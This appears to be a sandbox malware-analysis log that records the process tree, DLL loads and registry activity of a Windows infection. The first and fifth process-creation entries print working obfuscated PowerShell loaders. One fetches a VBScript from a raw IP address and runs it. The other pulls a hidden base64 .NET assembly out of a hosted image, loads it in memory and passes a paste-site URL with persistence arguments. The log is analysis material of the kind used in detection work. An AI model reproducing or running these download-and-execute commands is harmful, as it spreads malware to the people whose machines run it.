Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4B4.tmp" "c:\Users\user\AppData\Local\Temp\e0waei52\CSC9C05B393FD2448C976B42B57429CCF7.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() \| ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: $fq7C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.pdb source: powershell.exe, 00000003.00000002.1829980353.0000000004BE8000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2154082087.0000000007870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestr